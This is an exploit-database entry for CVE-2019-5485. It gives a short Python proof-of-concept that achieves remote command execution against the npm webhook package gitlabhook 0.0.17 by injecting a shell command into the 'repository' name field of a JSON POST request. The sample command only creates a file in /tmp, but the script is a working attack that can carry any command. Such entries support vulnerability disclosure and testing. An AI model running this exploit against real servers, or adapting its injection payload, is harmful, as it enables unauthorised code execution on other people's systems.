NPMJS gitlabhook 0.0.17 - repository Remote Command Execution

2019-09-25T00:00:00
ID EXPLOITPACK:AFE45BB455FCF4322189ECA927CFC87A
Type exploitpack
Reporter Semen Alexandrovich Lyhin
Modified 2019-09-25T00:00:00

Description

NPMJS gitlabhook 0.0.17 - repository Remote Command Execution

                                        
                                            # Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10. 
# CVE : CVE-2019-5485

#!/usr/bin/python

import requests

target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"
json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
r = requests.post(target, json)

print "Done."